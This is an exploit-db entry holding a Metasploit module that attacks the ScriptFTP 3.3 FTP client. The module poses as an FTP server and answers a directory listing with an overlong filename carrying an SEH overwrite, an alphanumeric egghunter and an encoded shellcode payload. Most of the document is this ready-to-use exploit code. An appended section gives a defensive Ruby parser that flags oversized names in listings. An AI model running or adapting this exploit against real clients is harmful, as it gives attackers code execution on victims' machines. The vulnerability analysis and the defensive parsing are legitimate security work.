#Exploit Title: ScriptFTP 3.3 Remote Buffer Overflow (MSF)
#Date: Sept 20 2011
#Author: otoy
#Version: 3.3
#Tested on: Windows XP SP3
#CVE : -
#EDB-ID: 17876
#Thanks: cyb3r.anbu, spentera-team, dE-team, offsec, exploit-db, corelanc0d3r

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Exploit::Remote::FtpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ScriptFTP 3.3 Remote Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in ScriptFTP 3.3 ftp client.
				The overflow is triggered when the client connects to a FTP server which
				sends an overly long directory and filename in response to a GETLIST
				command. This will cause an access violation, and will eventually
				overwrite the saved extended instruction pointer.
			},
			'Author'         =>
				[
					'modpr0be',  # Original bug
					'Cyberheb',  # porting from poc to msf
					'Otoy',      # final msf module
				],
			'License'        => MSF_LICENSE,
			'Version'        => "0",
			'References'     =>
				[
					[ 'OSVDB', '75633' ],
					[ 'URL', 'http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'          => 1000,
					'DisableNops'    => true,
					'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
					'BadChars'       => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e",
					'EncoderOptions' =>
						{
							'BufferRegister' => 'EDX',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP Universal', { 'Ret' => "\x45\x5B", 'Offset' => 1746 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Sept 20 2011',
			'DefaultTarget'  => 0))
	end

	def setup
		super
	end

	def on_client_unknown_command(c, cmd, arg)
		c.put("200 OK\r\n")
	end

	#Unicode Encoder
	def get_unicode_payload(p)
		encoder = framework.encoders.create("x86/unicode_upper")
		encoder.datastore.import_options_from_hash( {'BufferRegister' => 'EAX'} )
		unicode_payload = encoder.encode(p, nil, nil, platform)
		return unicode_payload
	end

	def on_client_command_list(c, arg)
		conn = establish_data_connection(c)
		if(not conn)
			c.put("425 Can't build data connection\r\n")
			return
		end

		print_status(" - Data connection set up")

		code = 150
		c.put("#{code} Here comes the directory listing.\r\n")
		code = 226
		c.put("#{code} Directory send ok.\r\n")

		#sampah = junk, telur = egg (Indonesian variable names)
		sampahawal = "A" * 1746
		nseh = "\x61\x62"
		seh = target['Ret']
		sampahbawah = 1250

		#prepare for align
		align = "\x60"            #pushad
		align << "\x73"           #nop/align
		align << "\x53"           #push ebx
		align << "\x73"           #nop/align
		align << "\x58"           #pop eax
		align << "\x73"           #nop/align
		align << "\x05\x02\x11"   #add eax,0x11000200
		align << "\x73"           #nop/align
		align << "\x2d\x01\x11"   #sub eax,0x11000120
		align << "\x73"           #nop/align

		#align after egg
		align2 = "\x73\x57\x73\x58\x73"   #nop/push edi/nop/pop eax/nop
		align2 << "\xb9\x1b\xaa"          #mov ecx,0xaa001b00
		align2 << "\xe8\x73"              #add al,ch + nop
		align2 << "\x50\x73\xc3"          #push eax,nop,ret

		#walking
		walk = "\x50"    #push eax
		walk << "\x73"   #nop/align
		walk << "\xc3"   #ret

		#egghunter
		egghunter = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
		egghunter << "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
		egghunter << "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
		egghunter << "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
		egghunter << "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
		egghunter << "SEYWKOYWA"

		#junk
		sampah1 = "\x44" * 106 + "\x73"
		sampah2 = "\x42" * 544

		#egg
		telur = "0t0t"

		#payload
		stubget = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
		palpha = stubget + payload.encoded
		puni = get_unicode_payload(palpha)

		#filename
		filename = sampahawal
		filename << nseh
		filename << seh
		filename << align
		filename << walk
		filename << sampah1
		filename << egghunter
		filename << sampah2
		filename << telur
		filename << align2
		filename << puni
		filename << sampah1

		print_status(" - Sending directory list via data connection")
		#the overlong name built above is what the client overflows on
		dirlist = "-rwxrwxrwx 1 1000 11111 Jun 11 21:10 #{filename}.txt\r\n"
		dirlist << "drwxrwxrwx 1 1000 11111 Jun 11 21:10 #{filename}\r\n"
		dirlist << "-rwxrwxrwx 1 1000 11111 Jun 11 21:10 #{filename}.txt\r\n"
		conn.put(dirlist)
		conn.close
		return
	end
end
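The bug above is a client trusting the length of names in a LIST response. As an added example (not part of the exploit-db entry or the module), here is a defensive Ruby parser for Unix-style LIST output that bounds every entry name before a client would copy it into a fixed-size buffer. MAX_NAME_LEN and the sample listing are constructed assumptions; 1746 is the junk-prefix size the module above sends.

```ruby
# Added example: defensive handling of FTP LIST responses (not the module's code).
MAX_NAME_LEN = 255  # assumed upper bound, in bytes, for a single entry name

# perms, then links/owner/group(/size) fields, then "Mon DD HH:MM|YYYY", then the name
LIST_LINE = /\A(\S+)\s+(.*?)\s+([A-Z][a-z]{2})\s+(\d{1,2})\s+(\d{1,2}:\d{2}|\d{4})\s+(.+)\z/

# Returns a hash for one listing line, or nil when the line is not ls-style output.
def parse_list_line(line)
  m = LIST_LINE.match(line.chomp)
  return nil unless m
  { perms: m[1], month: m[3], day: m[4].to_i, time: m[5], name: m[6] }
end

# Walks a whole LIST response and reports entries a client must not accept:
# unparseable lines, names longer than max_len bytes, names with non-printable bytes.
def check_listing(listing, max_len: MAX_NAME_LEN)
  findings = []
  listing.each_line.with_index(1) do |raw, no|
    entry = parse_list_line(raw)
    if entry.nil?
      findings << { line: no, reason: :unparseable }
    elsif entry[:name].bytesize > max_len
      findings << { line: no, reason: :oversized, length: entry[:name].bytesize }
    elsif entry[:name] =~ /[^[:print:]]/
      findings << { line: no, reason: :nonprintable }
    end
  end
  findings
end

# Constructed sample: one benign entry, one entry whose name is as long as the
# module's 1746-byte junk prefix, and one line that is not a directory entry.
SAMPLE_LISTING = "-rwxrwxrwx 1 1000 11111 Jun 11 21:10 notes.txt\r\n" +
                 "drwxrwxrwx 1 1000 11111 Jun 11 21:10 " + ("A" * 1746) + "\r\n" +
                 "garbage line\r\n"

if __FILE__ == $0
  check_listing(SAMPLE_LISTING).each { |f| puts f.inspect }
end
```

A client that drops or truncates flagged entries before touching its own buffers never reaches the overflow, whatever the server sends.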